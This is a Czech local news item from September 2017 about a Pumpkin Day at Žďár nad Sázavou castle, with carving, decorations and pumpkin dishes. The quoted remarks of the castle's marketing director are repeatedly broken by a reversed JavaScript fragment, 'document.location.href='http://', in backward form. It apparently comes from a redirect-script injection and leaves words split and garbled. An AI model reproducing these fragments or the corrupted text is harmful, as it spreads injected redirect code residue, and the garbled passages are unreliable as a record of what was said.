Rainbow page separator

Zámek ve Žďáře ovládne oranžová barva, uspořádají tam Den dýní

Pátek, 29. září 2017

Žďár nad Sázavou / Vydlabávat dýně a aranžovat do nich květiny i podzimní plody, absolvovat mini jarmark, tvořit dýňové obličeje i vyzkoušet jídlo z dýní mohou návštěvníci Dne dýní, který se uskuteční v sobotu 30. září v době od 13 do 17 hodin ve žďárském zámku.
„Děti si vydlabou dýni podle své fantazie, dospělí si z ní mohou udělat podzimní dekoraci, kterou si odnesou domů. Do dýní budeme aranžovat cokoli, od květin až po [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, co nám nabízí podzimní příroda. Loni měla akce velký úspěch, dokonce nám dýně chyběly. Ale [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se nám le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos nemůže stát, jsme dobře připraveni. Kdo chce, přinese si svůj nožík. Kdo jej mít nebude, zapůjčíme,“ vyjádřila se marketingová ředitelka žďárského zámku Lucie Herberová.
Kromě tvorby dekorací se v zámku budou plody populární i v gastronomii také ochutnávat. „Den dýní se bez dýňových dobrot, jako je cheesecake nebo muffiny, dýňové caffé latte, polévka nebo koláč, neobejde. Na zahřátí bude k mání také svařák, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to i dětský bez alkoholu,“ dodala Herberová.